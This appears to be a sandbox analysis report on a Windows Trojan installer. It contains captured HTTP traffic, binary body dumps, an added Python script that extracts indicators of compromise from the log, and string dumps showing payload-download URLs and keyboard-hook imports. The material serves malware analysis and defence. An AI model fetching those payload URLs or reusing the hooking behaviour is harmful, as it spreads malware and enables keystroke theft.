....6....9..v.u..A9A-o..'...0./...J)&..as..~.....c0....e...y.o.|..?.u.K.\.%.r............^.S.|W..,.....}W.*..].U/}bi..].....%....^......wCv.2f..e....\...8.....aB.....5!l.....}.*...x.lI.. .n... ,....<..5..9^.5h...QZ...FP......Y.CW.@x.N.k........./.....5...>D..5.[.2....j..g.J...|......mY.y.........x..........`.7'..0.iI...t<....z\..,..]....J..h.....R..25......t..K'q#.....N...f...O..a3L.....A..:......b.. .j=....6.....Z'.,....\.\D.....ah%.w....8e.n.....qhh..x.....!4.....(.c......8<5..1..CH......qq.N........e...r~Y.,]V/./.u..Lr...LA.f.....!0.z..X..... ..fd....u&B......qy..3p.".f&<.B|s.....v%^...]......p..........<.s.V.Kb....r<Q|.x..w,.a.Xr....f.147a...J./7.........(5..p4....*o...F..yC.h*}.5.~H.q..`kd.?|<Z9u....z... >...z..y.C]O....<.N!...<M@.@B6.,d.
<<
<<< skipped >>>
GET /v53/imgn/guide_tip.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: image/png
Content-Length: 10442
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E388CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E3040A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky......f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<.............i......h-....@_~.. _&.2%...<..........k......w.d./.....U 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.jjj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.
<<
<<< skipped >>>
GET /imgn/123ie/setting_icon.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p6.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 76
Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.............#.....!.......,.............".8....=h%v..n!.....y.h.....;
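Most of the traffic above is start-page furniture (CDN images, skins, a city-list script). The part worth keeping is the pair of pv.gif requests to pb.sogou.com: both are answered 200 with Content-Length: 0 and a text/xml type, so they are tracking endpoints rather than images, and they carry pid=Af22014, the same value the GOTO cookie holds and, as 22014, the query of the loaded start page hXXp://123.sogou.com/?22014. An identifier that appears in three places like that is the thing to pivot on. As an added example (not part of this report or its tooling), the following Python parses a log in this layout and pulls out hosts, URLs, cookies set, the beacon requests and that tag. SAMPLE_LOG is abridged from the requests above; the beacon heuristic and the pid/GOTO/referer-query tag logic are this example's own assumptions.

```python
"""Extract network IOCs from a sandbox HTTP log in the layout used above:
request line, request headers, response status line, response headers,
then a (mostly binary) body dump.  Added example, not the sandbox's own
tooling.  SAMPLE_LOG is abridged from the capture on this page; the
'hXXp' scheme is the report's defanging and is undone before parsing."""
import re
from urllib.parse import parse_qsl, urlsplit

REQ_LINE = re.compile(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$")
# The reason phrase must run to end of line, so the report's raw re-dumps
# ("HTTP/1.1 200 OK..Server: nginx..") fall through to the body branch
# instead of being counted as a second response.
RESP_LINE = re.compile(r"^HTTP/1\.[01] (\d{3})(?: [A-Za-z ]*)?$")
HEADER = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): ?(.*)$")

# constructed from the requests above; query strings shortened
SAMPLE_LOG = """\
GET /pv.gif?uigs_productid=daohang&rdk=1399956570493&pid=Af22014&ptype=index HTTP/1.1
Referer: hXXp://123.sogou.com/?22014
Host: pb.sogou.com
Cookie: GOTO=Af22014
HTTP/1.1 200 OK
Content-Type: text/xml
Content-Length: 0
Set-Cookie: SUV=0066339EC18AF4E75371A4567C72F260; expires=Fri, 10-May-24 04:49:26 GMT; domain=.sogou.com; path=/
HTTP/1.1 200 OK..Server: nginx..Content-Type: text/xml..Content-Length: 0..
GET /jsn/citydata.js HTTP/1.1
Referer: hXXp://123.sogou.com/?22014
Host: d.123.sogou.com
Cookie: ipt=0; SDUV=1399956570462_5852_00001; GOTO=Af22014
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Encoding: gzip
5c2b............m.Yo[I...W.t..o{......
<<
<<< skipped >>>
GET /imgn/v32/skin3.gif HTTP/1.1
Referer: hXXp://123.sogou.com/?22014
Host: p0.123.sogoucdn.com
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 4159
GIF89a..h..........R..J..Bs.S.....
"""


def parse_transactions(log):
    """Split the log into request/response pairs; body lines are skipped."""
    txns, cur, section = [], None, None
    for line in log.splitlines():
        m = REQ_LINE.match(line)
        if m:
            cur = {"method": m.group(1), "path": m.group(2),
                   "status": None, "req": {}, "resp": {}}
            txns.append(cur)
            section = "req"
            continue
        m = RESP_LINE.match(line)
        if m and cur is not None:
            cur["status"] = int(m.group(1))
            section = "resp"
            continue
        h = HEADER.match(line)
        if h and section is not None:
            cur[section][h.group(1).lower()] = h.group(2)
        else:
            section = None  # body bytes, "<<< skipped >>>", raw re-dumps
    return txns


def is_beacon(t):
    """Heuristic: a 200 with an empty body on an image path is a tracking
    pixel, not an image (the pv.gif requests above look exactly like this)."""
    return (t["status"] == 200 and t["path"].split("?")[0].endswith(".gif")
            and t["resp"].get("content-length") == "0")


def extract_iocs(txns):
    hosts, urls, tags, referers, cookies = set(), set(), set(), set(), {}
    for t in txns:
        host = t["req"].get("host")
        u = urlsplit(t["path"])
        if host:
            hosts.add(host)
            urls.add(f"http://{host}{u.path}")
        # the tag travels three ways: pid= in the beacon query, the GOTO
        # cookie, and the bare query on the landing page (assumed linkage)
        for k, v in parse_qsl(u.query, keep_blank_values=True):
            if k == "pid":
                tags.add(v)
        for part in t["req"].get("cookie", "").split(";"):
            name, _, val = part.strip().partition("=")
            if name == "GOTO":
                tags.add(val)
        ref = t["req"].get("referer", "").replace("hXXp://", "http://", 1)
        if ref:
            r = urlsplit(ref)
            referers.add(r.hostname)
            if r.query:
                tags.add(r.query)
        sc = t["resp"].get("set-cookie")
        if sc:
            dom = re.search(r"domain=([^;]+)", sc, re.I)
            cookies[sc.split("=", 1)[0]] = dom.group(1) if dom else host
    return {"hosts": sorted(hosts), "urls": sorted(urls), "tags": sorted(tags),
            "referers": sorted(referers), "cookies": cookies,
            "beacons": [t["path"].split("?")[0] for t in txns if is_beacon(t)]}


if __name__ == "__main__":
    for k, v in extract_iocs(parse_transactions(SAMPLE_LOG)).items():
        print(f"{k}: {v}")
```

Run as a script it prints the IOC sets for the sample. The "tags" entry is the one to keep: when the pid= value, the GOTO cookie and the landing-page query all agree, as they do here, that value is a stable fingerprint to search for in other captures, whereas the CDN hostnames and image paths are shared with every legitimate visitor of the same start page.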
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_204:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
http://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|<>/":
*?|<>/":
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
r.png
r.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
open.ini
open.ini
tEXtXML:com.adobe.xmp
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"></rdf:RDF>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"></rdf:RDF>
xmlns:xap="http://ns.adobe.com/xap/1.0/">
xmlns:xap="http://ns.adobe.com/xap/1.0/">
xmlns:dc="http://purl.org/dc/elements/1.1/">
xmlns:dc="http://purl.org/dc/elements/1.1/">
Undo=toolbar\16_undo.png
Undo=toolbar\16_undo.png
Undo.Hover=toolbar\16_undo2.png
Undo.Hover=toolbar\16_undo2.png
Undo.DrawBackground=1
Undo.DrawBackground=1
Favorites=toolbar\16_favorites.png
Favorites=toolbar\16_favorites.png
Favorites.Hover=toolbar\16_favorites2.png
Favorites.Hover=toolbar\16_favorites2.png
Favorites.DrawBackground=1
Favorites.DrawBackground=1
Feed.DrawBackground=1
Feed.DrawBackground=1
History=toolbar\16_history.png
History=toolbar\16_history.png
History.Hover=toolbar\16_history2.png
History.Hover=toolbar\16_history2.png
History.DrawBackground=1
History.DrawBackground=1
Layout.DrawBackground=1
Layout.DrawBackground=1
FontSize.DrawBackground=1
FontSize.DrawBackground=1
Encoding.DrawBackground=1
Encoding.DrawBackground=1
Zoom=toolbar\16_page_zoom.png
Zoom=toolbar\16_page_zoom.png
Zoom.Hover=toolbar\16_page_zoom2.png
Zoom.Hover=toolbar\16_page_zoom2.png
Zoom.DrawBackground=1
Zoom.DrawBackground=1
Proxy.DrawBackground=1
Proxy.DrawBackground=1
Tools.DrawBackground=1
Tools.DrawBackground=1
Plugins.DrawBackground=1
Plugins.DrawBackground=1
Security.DrawBackground=1
Security.DrawBackground=1
PageContent.DrawBackground=1
PageContent.DrawBackground=1
Edit=toolbar\16_edit.png
Edit=toolbar\16_edit.png
Edit.DrawBackground=1
Edit.DrawBackground=1
Save.DrawBackground=1
Save.DrawBackground=1
Options.DrawBackground=1
Options.DrawBackground=1
FormFiller.DrawBackground=1
FormFiller.DrawBackground=1
Screenshot.DrawBackground=1
Screenshot.DrawBackground=1
Page=misc\16_page.png
Page=misc\16_page.png
AddressBar=misc\16_page.png
AddressBar=misc\16_page.png
DefaultTabIcon=misc\16_page.png
DefaultTabIcon=misc\16_page.png
Search=toolbar\16_search.png
Search=toolbar\16_search.png
SearchBar=toolbar\16_search.png
SearchBar=toolbar\16_search.png
FolderOpen=misc\16_folder_open.png
FolderOpen=misc\16_folder_open.png
FolderClose=misc\16_folder_closed.png
FolderClose=misc\16_folder_closed.png
FolderClose.hover=misc\16_folder_open.png
FolderClose.hover=misc\16_folder_open.png
WebsiteInfo=misc\16_website_info.png
WebsiteInfo=misc\16_website_info.png
Go=misc\24_go.png
Go=misc\24_go.png
Go.Hover=misc\24_go2.png
Go.Hover=misc\24_go2.png
AdHunter=misc\16_ad_hunter.png
AdHunter=misc\16_ad_hunter.png
_Add=shared\16_new.png
_Add=shared\16_new.png
_Edit=shared\16_edit.png
_Edit=shared\16_edit.png
_Search=toolbar\16_search.png
_Search=toolbar\16_search.png
Caption=control\caption.ico
Caption=control\caption.ico
OpenInNew=misc\16_open_in_new.png
OpenInNew=misc\16_open_in_new.png
ForceTabInBK=misc\16_open_in_bg.png
ForceTabInBK=misc\16_open_in_bg.png
Caption.Text=#555555
Caption.Text=#555555
Status.Address.Text=#555555
Status.Address.Text=#555555
Toolbar.Normal.Text=#4F7639
Toolbar.Normal.Text=#4F7639
Toolbar.Disable.Text=#999999
Toolbar.Disable.Text=#999999
Toolbar.Gripper.Style=Dashed
Toolbar.Gripper.Style=Dashed
Toolbar.Gripper.Width=2
Toolbar.Gripper.Width=2
Toolbar.Gripper.Gap=2
Toolbar.Gripper.Gap=2
Toolbar.Gripper.Percent=90
Toolbar.Gripper.Color=#6281aa
Toolbar.Gripper.ShadowColor=#f8fafd
Toolbar.Separator.Style=Solid
Toolbar.Separator.Width=1
Toolbar.Separator.Percent=90
Toolbar.Separator.Color=#6281aa
Toolbar.Separator.ShadowColor=#f8fafd
Toolbar.Hover.Text=#000066
Toolbar.Hover.Border=#7CA5FA
Toolbar.Hover.Start=#FFFFFF
Toolbar.Hover.End=#C6D8FD
Toolbar.Checked.Text=#000066
Toolbar.Checked.Border=#7CA5FA
Toolbar.Checked.Start=#E7EEFE
Toolbar.Checked.End=#FFFFFF
Toolbar.Pressed.Text=#003399
Toolbar.Pressed.Border=#7CA5FA // Not Impletemented
Toolbar.Pressed.Start=#E7EEFE
Toolbar.Pressed.End=#FFFFFF
Menu.Normal.Text=#444444
Menu.Disable.Text=#999999
Menu.Border=#77a861
Menu.Separator.Style=Solid
Menu.Separator.Width=2
Menu.Separator.Percent=90
Menu.Separator.Color=#77A861
Menu.Separator.ShadowColor=#f8fafd
Menu.Hover.Text=#000066
Menu.Hover.Border=#7CA5FA
Menu.Hover.Start=#FFFFFF
Menu.Hover.End=#C6D8FD
Menu.Checked.Text=#000066
Menu.Checked.Border=#7CA5FA
Menu.Checked.Start=#E7EEFE
Menu.Checked.End=#FFFFFF
Menu.LabelBackground.Start=#ffffff
Menu.LabelBackground.End=#000000
Tab.Normal.Text=#4F7639
Tab.Hover.Text=#4F7639
Tab.Active.Text=#4F7639
ComboBox.Text=#387B2F
//MainPanel.Style=GFill
//MainPanel.Fill.ColorStart=#F6F9FD
//MainPanel.Fill.ColorEnd=#D5E3F7
//MainPanel.Fill.Angle=90
MainPanel.Style=3Image
MainPanel.Image=control\title_bg.png
MainPanel.Image.StartOffset=0
MainPanel.Image.EndOffset=0
MainPanel.Image.Stretch=0
MenuBar.Style=Transparent
Menu.Style=GFill
Menu.Fill.ColorStart=#f6f9fd
Menu.Fill.ColorEnd=#E0F0DC
Menu.Fill.Angle=90
MenuStrip.Style=Transparent
ToolBar.Style=Transparent
WebBar.Style=GFill
WebBar.Fill.ColorStart=#7b7153
WebBar.Fill.ColorEnd=#9b998f
WebBar.Fill.Angle=90
FloatBar.Style=GFill
FloatBar.Fill.ColorStart=#EAF2F9
FloatBar.Fill.ColorEnd=#D5E3F7
FloatBar.Fill.Angle=90
StatusBar.Style=GFill
StatusBar.Fill.ColorStart=#F7F6F5
StatusBar.Fill.ColorEnd=#D5E3F7
StatusBar.Fill.Angle=90
StatusBar.Style=Image
StatusBar.Image=control\status_bar_bg.png
StatusBar.Image.Stretch=1
FindInPageBar.Style=GFill
FindInPageBar.Fill.ColorStart=#F7F6F5
FindInPageBar.Fill.ColorEnd=#D5E3F7
FindInPageBar.Fill.Angle=90
StatusBar.Style=3Image
StatusBar.Image.StartOffset=15
StatusBar.Image.EndOffset=15
StatusBar.Image.Stretch=0
Button.Normal.Style=Transparent
Button.Hover.Style=3Image
Button.Hover.Image=control\Button_Hover.png
Button.Hover.Image.StartOffset=2
Button.Hover.Image.EndOffset=2
Button.Hover.Image.Stretch=1
Button.Pressed.Style=3Image
Button.Pressed.Image=control\Button_Pressed.png
Button.Pressed.Image.StartOffset=2
Button.Pressed.Image.EndOffset=2
Button.Pressed.Image.Stretch=1
Button.Disabled.Style=3Image
Button.Disabled.Image=control\Button_disabled.png
Button.Disabled.Image.StartOffset=2
Button.Disabled.Image.EndOffset=2
Button.Disabled.Image.Stretch=1
Button.Checked.Style=3Image
Button.Checked.Image=control\Button_Checked.png
Button.Checked.Image.StartOffset=2
Button.Checked.Image.EndOffset=2
Button.Checked.Image.Stretch=1
MenuItem.Hover.Style=3Image
MenuItem.Hover.Image=control\MenuItem_Hover.png
MenuItem.Hover.Image.StartOffset=15
MenuItem.Hover.Image.EndOffset=15
MenuItem.Hover.Image.Stretch=1
Tab.Normal.Image=control\tab_inactive.png
Tab.Normal.Image.StartOffset=8
Tab.Normal.Image.EndOffset=8
Tab.Normal.Image.Stretch=1
Tab.Normal.StartOut=2
Tab.Normal.EndOut=0
Tab.Normal.Padding=0 0 2 0
Tab.Hover.Image=control\tab_hover.png
Tab.Hover.Image.StartOffset=8
Tab.Hover.Image.EndOffset=8
Tab.Hover.Image.Stretch=0
Tab.Unread.Image.StartOffset=8
Tab.Unread.Image.EndOffset=8
Tab.Unread.Image.Stretch=1
Tab.Active.Image=control\tab_active.png
Tab.Active.Image.StartOffset=12
Tab.Active.Image.EndOffset=12
Tab.Active.Image.Stretch=0
Tab.Active.StartOut=4
Tab.Active.EndOut=3
Tab.Active.Padding=0 0 2 0
Background.Style=3Image
Background.Image=control\tab_bg.png
Background.Image.StartOffset=4
Background.Image.EndOffset=4
Background.Image.Stretch=1
InactiveBackground.Style=3Image
InactiveBackground.Image.StartOffset=4
InactiveBackground.Image.EndOffset=4
InactiveBackground.Image.Stretch=0
TabProgress.Style=Progress
TabProgress.HideIcon=1
TabProgress.Offset=0 0
TabProgress.Image.FrameWidth=16
TabClose=control\tab_close.png
TabClose.Hover=control\tab_close_hover.png
TabClose.Offset=-6 6
TabClose.ExtendSpace=20
Tab.Normal.Image=control\sidebar_tab_inactive.png
Tab.Normal.Image.StartOffset=10
Tab.Normal.Image.EndOffset=4
Tab.Normal.StartOut=0
Tab.Normal.Padding=0 0 0 4
Tab.Active.Image=control\sidebar_tab_active.png
Tab.Active.Image.StartOffset=14
Tab.Active.Image.EndOffset=4
Tab.Active.StartOut=2
Tab.Active.EndOut=0
Tab.Active.Padding=0 0 0 0
TitleBackground.Style=GFill
TitleBackground.Fill.ColorStart=#E4F2DD
TitleBackground.Fill.ColorEnd=#E0ECD9
TitleBackground.Fill.Angle=90
TabBackground.Style=GFill
TabBackground.Fill.ColorStart=#CCDEC3
TabBackground.Fill.ColorEnd=#D4E3CC
TabBackground.Fill.Angle=90
Background.Normal.Image=control\combo.png
Background.Normal.Image.StartOffset=8
Background.Normal.Image.EndOffset=8
Background.Normal.Image.Stretch=0
Background.Hover.Image=control\combo_hover.png
Background.Hover.Image.StartOffset=8
Background.Hover.Image.EndOffset=8
Background.Hover.Image.Stretch=0
Thumb.Normal.Image=control\combo_dropdown.png
Thumb.Hover.Image=control\combo_dropdown_hover.png
Foreground.Style=3Image
Foreground.Image=control\progress.png
Foreground.Image.StartOffset=2
Foreground.Image.EndOffset=9
Foreground.Image.Stretch=1
Background.Image.StartOffset=2
Background.Image.EndOffset=9
nsu2.tmp
0C-29-8A-8B-37&md5=8eff8335308629faaae7eeb9444da07a&ini=open.ini&v=1.0.0.0
1.0.0.0
//www.sj88.com/hezi/jm/setup_a7158.rar
ns_61.rar
360.ini
c:\%original file name%.exe
%Program Files%\greeou
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
setup_a7158.exe
http://www.sj88.com/hezi/jm/setup_a7158.rar
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
%Documents and Settings%\%current user%\Desktop\
http://hh8.xjtj.org
1.0.0.0
%original file name%.exe_204_rwx_10004000_00001000:
callback%d
greendou.exe_772:
.text
`.rdata
@.data
.rsrc
pdh.dll
>1.2.10
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
GetUrlCacheEntryInfoW
FindCloseUrlCache
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WININET.dll
WS2_32.dll
MFC42u.DLL
MSVCRT.dll
_wcmdln
GetWindowsDirectoryW
KERNEL32.dll
GetKeyState
EnumChildWindows
UnregisterHotKey
RegisterHotKey
keybd_event
MapVirtualKeyW
USER32.dll
SetViewportOrgEx
GDI32.dll
RegCloseKey
RegOpenKeyW
RegCreateKeyW
RegDeleteKeyW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileW
urlmon.dll
MSVCP60.dll
VERSION.dll
imagehlp.dll
WINMM.dll
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyNameTextW
MapVirtualKeyExW
GetKeyboardLayout
GetKeyboardState
GetKeyboardLayoutList
GetViewportOrgEx
iie.exe
%y%m%d%H%M%S
http://localhost
http://127.0.0.1
127.0.0.1
favicon.ico
http://
CWebBrowser2
\update.ini
application/x-www-form-urlencoded
HTTPS://
HTTP://
Ryeol HTTP Client Class
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The encoded URL is not valid.
The port number is not valid.
The requested URL is not a valid URL.
.?AVerrmsg_exceptionA@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
CHttpEncoderA::_AnsiCharToUtf8Char: szUtf8Char and szAnsiChar can not be NULL.
CHttpEncoderA::UrlEncodeW: szBuff can not be NULL.
.PAVCFileException@@
.PAVCArchiveException@@
.PAVCOleException@@
.PAVCMemoryException@@
GDI32.DLL
RICHED32.DLL
RICHED20.DLL
shlwapi.dll
1.2.10
UXTHEME.DLL
.PAVCException@@
PSAPI.DLL
NULL row buffer for row %ld, pass %d
RICHED20.dll
libpng error: %s
libpng error: %s, offset=%d
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
iTXt chunk not supported.
IE9.IE9NSHandle.1 = s 'IE9NSHandle Class'
CLSID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
IE9.IE9NSHandle = s 'IE9NSHandle Class'
ForceRemove {00B39D47-3331-49a7-B54E-32AE6E993C67} = s 'IE9NSHandle Class'
ProgID = s 'IE9.IE9NSHandle.1'
VersionIndependentProgID = s 'IE9.IE9NSHandle'
val AppID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
'TypeLib' = s '{14264AA3-BB53-4d3a-89DE-05AD67D6D6C6}'
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
Config.dll